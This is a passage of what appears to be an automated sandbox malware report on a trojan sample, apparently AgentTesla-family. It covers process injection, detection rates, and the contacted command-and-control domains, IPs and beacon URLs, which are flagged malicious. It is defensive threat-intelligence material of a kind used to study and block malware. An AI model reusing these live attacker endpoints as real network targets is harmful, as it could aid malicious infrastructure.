network (likely due to code injection or exploit) 18->54 22 msdt.exe 18->22         started        signatures11 process12 dnsIp13 44 192.168.2.1 unknown unknown 22->44 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DNPr7t0GMY.exe56%VirustotalBrowse
          DNPr7t0GMY.exe40%MetadefenderBrowse
          DNPr7t0GMY.exe61%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          DNPr7t0GMY.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.DNPr7t0GMY.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.DNPr7t0GMY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.brunoecatarina.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.brunoecatarina.com/p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD80%Avira URL Cloudsafe
          https://www.casar.com/assunto/organizacao/0%Avira URL Cloudsafe
          http://www.cleanxcare.com/p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD80%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/decoracao-de-casamento/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.ololmychartlogin.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG0%Avira URL Cloudsafe
          https://www.casar.com/assunto/lua-de-mel-2/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          https://www.casar.com0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.swayam-moj.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/dicas-para-noivas/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.essentiallyourscandles.com/p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD80%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/casamentos-reais/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/cha-de-panela/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/vestidos-de-noiva/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.ruhexuangou.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.yunlimall.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR010%Avira URL Cloudsafe
          http://www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d60%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          13.59.53.244
          truefalse
            high
            www.brunoecatarina.com
            54.85.86.211
            truetrueunknown
            www.yunlimall.com
            142.111.47.2
            truetrue
              unknown
              thriveglucose.com
              184.168.131.241
              truetrue
                unknown
                www.ololmychartlogin.com
                212.32.237.92
                truetrue
                  unknown
                  www.ruhexuangou.com
                  23.82.57.32
                  truetrue
                    unknown
                    parkingpage.namecheap.com
                    198.54.117.216
                    truefalse
                      high
                      cleanxcare.com
                      78.31.67.91
                      truetrue
                        unknown
                        shops.myshopify.com
                        23.227.38.74
                        truetrue
                          unknown
                          ext-sq.squarespace.com
                          198.185.159.144
                          truefalse
                            high
                            swayam-moj.com
                            199.195.117.147
                            truetrue
                              unknown
                              www.thriveglucose.com
                              unknown
                              unknowntrue
                                unknown
                                www.boogerstv.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.kce0728com.net
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.cleanxcare.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.painhut.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.totally-seo.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.essentiallyourscandles.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.swayam-moj.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.advancedaccessapplications.com
                                              unknown
                                              unknowntrue
                                                unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.brunoecatarina.com/p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.cleanxcare.com/p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.ololmychartlogin.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WGtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                www.adultpeace.com/p2io/true
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                low
                                                http://www.swayam-moj.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Hatrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.essentiallyourscandles.com/p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.ruhexuangou.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbwtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.yunlimall.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6true
                                                • Avira URL Cloud: safe
                                                unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.casar.com/assunto/organizacao/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                      high
                                                      https://www.casar.com/assunto/casamentos/decoracao-de-casamento/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.tiro.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        https://www.casar.com/assunto/lua-de-mel-2/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.goodfont.co.krexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssDNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.typography.netDexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.casar.commsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://fontfabrik.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://embed.typeform.com/embed.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://connect.facebook.net/en_US/fbevents.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://casarpontocom.zendesk.com/hc/pt-brmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://www.casar.com/assunto/noivas/dicas-para-noivas/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fonts.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.sandoll.co.krexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDNPr7t0GMY.exe, 00000002.00000002.220254281.00000000032E1000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.pinterest.com/casarpontocommsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sakkal.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          https://www.casar.com/assunto/casamentos/casamentos-reais/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.youtube.com/casarpontocommsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.casar.com/assunto/cha-de-panela/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://www.casar.com/assunto/noivas/vestidos-de-noiva/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.carterandcone.comlexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                      high
                                                                                      https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://instagram.com/casarpontocommsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                          high

                                                                                          Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          142.111.47.2
                                                                                          www.yunlimall.comUnited States
                                                                                          18779EGIHOSTINGUStrue
                                                                                          23.82.57.32
                                                                                          www.ruhexuangou.comUnited States
                                                                                          7203LEASEWEB-USA-SFO-12UStrue
                                                                                          13.59.53.244
                                                                                          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                                          16509AMAZON-02USfalse
                                                                                          54.85.86.211
                                                                                          www.brunoecatarina.comUnited States
                                                                                          14618AMAZON-AESUStrue
                                                                                          23.227.38.74
                                                                                          shops.myshopify.comCanada
                                                                                          13335CLOUDFLARENETUStrue
                                                                                          199.195.117.147
                                                                                          swayam-moj.comUnited States
                                                                                          55293A2HOSTINGUStrue
                                                                                          184.168.131.241
                                                                                          thriveglucose.comUnited States
                                                                                          26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                          212.32.237.92
                                                                                          www.ololmychartlogin.comNetherlands
                                                                                          60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                          78.31.67.91
                                                                                          cleanxcare.comGermany
                                                                                          24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue

                                                                                          Private

                                                                                          IP
                                                                                          192.168.2.1

                                                                                          General Information

                                                                                          Joe Sandbox Version:32.0.0 Black Diamond
                                                                                          Analysis ID:432808
                                                                                          Start date:10.06.2021
                                                                                          Start time:19:11:34
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 52s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:light
                                                                                          Sample file name:DNPr7t0GMY (renamed file extension from none to exe)
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:25
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:1
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.evad.winEXE@7/1@13/10
                                                                                          EGA Information:Failed
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 24.2% (good quality ratio 21.4%)
                                                                                          • Quality average: 69.5%
                                                                                          • Quality standard deviation: 33.1%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 0
                                                                                          Cookbook Comments:
                                                                                          • Adjust boot time
                                                                                          • Enable AMSI
                                                                                          Warnings:
                                                                                          Show All
                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • TCP Packets have been reduced to 100
                                                                                          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 23.211.6.115, 168.61.161.212, 184.30.20.56, 20.50.102.62, 2.20.142.210, 2.20.142.209, 51.103.5.186, 92.122.213.194, 92.122.213.247, 20.54.26.129
                                                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net
                                                                                          • Not all processes where analyzed, report is missing behavior information

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          19:12:26API Interceptor1x Sleep call for process: DNPr7t0GMY.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          142.111.47.2Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?fxo=4hXPulH8&7nn48v3P=FG8u3oFfRE5XA1/EPClu9ACxgqrSnZ6gPOMyaYsdv+YEYVVrg2Qkx6tP1TXHrOs8ZSpFIA==
                                                                                          tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?Yr0=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&6lFp-=X8U4Iv
                                                                                          ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?V6=r8hHaZdhBhPHdl&Apg8K=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy
                                                                                          U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?z8I4HhO=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&6lyPdB=iR-deNZP3
                                                                                          IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?n2MLF0Ux=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&Dj6t=CpStsPY
                                                                                          7LQAaB3oH4.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?JvHxx=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&I48=AFQl7ZhpHxzl
                                                                                          feAfWrgHcX.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?BvL=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21X4seU3byBjR4fh0g==&tXxd=M69Tz
                                                                                          a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?8pMhHJUH=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01&Gzux=XB2LdrUxY
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?rVLp5Z=S0GhCH_&RPx=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy
                                                                                          5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?NtTdgz=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21X4seU3byBjR4fh0g==&1bj=mj88chf8ThLT
                                                                                          Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?QJ=h484VFbPZ8O&Ztxhw=FG8u3oFfRE5XA1/EPClu9ACxgqrSnZ6gPOMyaYsdv+YEYVVrg2Qkx6tP1TXHrOs8ZSpFIA==
                                                                                          u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?wh=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21XBzv00VkdkR4fmnQ==&BR=CpFH
                                                                                          g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?Ezut_6Ph=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01&lhuLO=TxllZ2B
                                                                                          1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?DXOl_=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&KtxH=PnCDGxnP7
                                                                                          g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?4h3=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01&vTapK=LJBpc8p
                                                                                          ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?8p=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21X4seU3byBjR4fh0g==&ChOh3=H0Gdhfb
                                                                                          23.82.57.32qXDtb88hht.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Z8E=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw&b0GDi6=Q6Ahtfox
                                                                                          wMKDi0Ss3f.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?4hfHN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw&y4=2doLnT
                                                                                          Request For Courtesy Call 7710090112332.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?8p-PuhEX=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&2djd=h6A8bhqxX4-P8B-0
                                                                                          bin.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?uN9hQ=ejlP_vuP4dl4N6&qFQl7Pf8=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1trRh/TEm4y3
